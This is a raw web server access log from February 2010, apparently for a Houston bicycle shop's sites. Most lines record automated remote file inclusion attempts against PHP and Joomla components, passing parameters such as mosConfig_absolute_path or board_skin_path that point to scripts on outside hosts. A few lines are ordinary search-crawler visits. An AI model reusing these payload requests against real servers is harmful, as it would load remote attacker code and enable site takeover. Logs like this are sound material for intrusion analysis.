200.93.147.154 - - [10/Feb/2010:03:31:55 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:03:31:55 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:03:31:55 -0800] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:03:32:11 -0800] "GET ///bbs/delete.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:03:32:11 -0800] "GET /logs/access.log%20%20////bbs/delete.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:03:32:11 -0800] "GET /logs////bbs/delete.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
76.174.234.119 - - [10/Feb/2010:03:34:49 -0800] "GET /logs/access_080610.log HTTP/1.0" 404 - "http://houstonbikeshop.com/logs/access_080610.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "houstonbikeshop.com"
76.174.234.119 - - [10/Feb/2010:03:36:51 -0800] "GET /logs/access_080710.log HTTP/1.0" 404 - "http://www.svbikes.com/logs/access_080710.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.svbikes.com"
81.26.219.151 - - [10/Feb/2010:03:39:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:03:39:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "houstonbikeshop.com"
77.88.25.28 - - [10/Feb/2010:03:42:12 -0800] "GET /fit.html HTTP/1.1" 200 17443 "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:03:44:33 -0800] "GET //SERVER%5BDOCUMENT_ROOT%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:03:44:33 -0800] "GET /logs///SERVER%5BDOCUMENT_ROOT%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:03:44:33 -0800] "GET /logs/access.log%20%20///SERVER%5BDOCUMENT_ROOT%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:03:47:08 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.12.33.30 - - [10/Feb/2010:03:47:12 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:03:47:13 -0800] "GET /logs/access.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:03:47:13 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.12.33.30 - - [10/Feb/2010:03:47:21 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.12.33.30 - - [10/Feb/2010:03:49:34 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:03:55:19 -0800] "GET /logs///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:03:55:19 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:03:55:19 -0800] "GET /logs/access.log%20%20///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:03:55:25 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:03:55:29 -0800] "GET /logs/access.log%20%20///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:03:55:29 -0800] "GET /logs///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
76.174.234.119 - - [10/Feb/2010:03:55:46 -0800] "GET /logs/access_081110.log HTTP/1.0" 404 - "http://bicyclestoreshouston.com/logs/access_081110.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "bicyclestoreshouston.com"
91.121.18.166 - - [10/Feb/2010:04:02:11 -0800] "GET /logs/access.log///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:04:04:40 -0800] "GET /logs/access.log///SERVER%5BDOCUMENT_ROOT%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [10/Feb/2010:04:04:58 -0800] "GET /logs/access.log///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:10:23 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:10:24 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:10:24 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:12:35 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:12:35 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:12:35 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:13:08 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:13:08 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:04:13:08 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.94.230 - - [10/Feb/2010:04:45:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "bicyclestoreshouston.com"
74.101.2.63 - - [10/Feb/2010:04:54:12 -0800] "GET /index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:04:54:12 -0800] "GET /logs/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:04:54:12 -0800] "GET /logs/access.log/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.94.230 - - [10/Feb/2010:04:54:39 -0800] "GET /bullitinboard/viewtopic.php?p=15453 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "bicyclestoreshouston.com"
77.79.246.80 - - [10/Feb/2010:04:55:57 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:04:55:57 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:04:55:57 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.192.48.157 - - [10/Feb/2010:04:56:10 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.192.48.157 - - [10/Feb/2010:04:56:10 -0800] "GET /write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.192.48.157 - - [10/Feb/2010:04:56:10 -0800] "GET /logs/write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:27 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:28 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:28 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:31 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:31 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:35 -0800] "GET /translations/Portuguese_BR.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:04:56:39 -0800] "GET /translations/Portuguese_BR.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:04:57:36 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:04:57:36 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.80 - - [10/Feb/2010:04:57:36 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.192.139.164 - - [10/Feb/2010:04:58:05 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.192.139.164 - - [10/Feb/2010:04:58:05 -0800] "GET /logs/access.log//bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.192.139.164 - - [10/Feb/2010:04:58:05 -0800] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:05:02:48 -0800] "GET /index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:05:02:48 -0800] "GET /logs/access.log/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:05:02:49 -0800] "GET /logs/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:05:38:17 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:05:38:17 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:05:38:17 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:05:38:21 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:05:38:21 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:05:38:21 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:05:40:40 -0800] "GET /?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.207.120.69 - - [10/Feb/2010:05:40:45 -0800] "GET /?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.831" "houstonbikeshop.com"
121.254.172.27 - - [10/Feb/2010:05:42:01 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [10/Feb/2010:05:42:01 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [10/Feb/2010:05:42:01 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [10/Feb/2010:05:42:03 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [10/Feb/2010:05:42:03 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [10/Feb/2010:05:42:03 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:05:48:43 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:05:48:44 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:05:48:44 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:05:58:11 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:05:58:11 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:05:58:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:05:58:13 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:05:58:13 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:05:58:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.101.2.63 - - [10/Feb/2010:06:00:37 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:00:46 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:00:46 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:00:46 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:00:51 -0800] "GET /?_PHPLIB[libdir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:00:51 -0800] "GET /logs//?_PHPLIB[libdir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:00:56 -0800] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.136 - - [10/Feb/2010:06:01:25 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.djramon.nl//gb/skins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.136 - - [10/Feb/2010:06:01:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.djramon.nl//gb/skins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.136 - - [10/Feb/2010:06:01:26 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.djramon.nl//gb/skins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:06:02:38 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:06:02:38 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:06:02:38 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.55.191.4 - - [10/Feb/2010:06:02:43 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anansigames.com///components/com_virtuemart/com/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:04:18 -0800] "GET /?_PHPLIB[libdir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:06:04:20 -0800] "GET /logs//?_PHPLIB[libdir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:05:51 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:05:51 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:05:51 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.7.40 - - [10/Feb/2010:06:06:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "bicyclestoreshouston.com"
195.190.166.35 - - [10/Feb/2010:06:08:11 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:08:11 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.190.166.35 - - [10/Feb/2010:06:08:11 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
198.171.171.177 - - [10/Feb/2010:06:09:13 -0800] "GET /appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
193.47.80.45 - - [10/Feb/2010:06:12:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "svbikes.com"
193.47.80.45 - - [10/Feb/2010:06:12:28 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "svbikes.com"
62.141.56.136 - - [10/Feb/2010:06:13:18 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.djramon.nl//gb/skins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.136 - - [10/Feb/2010:06:13:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.djramon.nl//gb/skins/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
